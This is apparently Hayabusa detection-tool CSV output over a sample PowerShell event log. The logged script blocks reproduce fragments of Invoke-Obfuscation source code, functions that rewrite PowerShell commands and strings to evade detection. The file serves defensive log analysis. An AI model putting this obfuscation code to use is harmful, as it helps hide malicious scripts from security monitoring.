operati",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. $TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. $ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. ""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace operati",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of 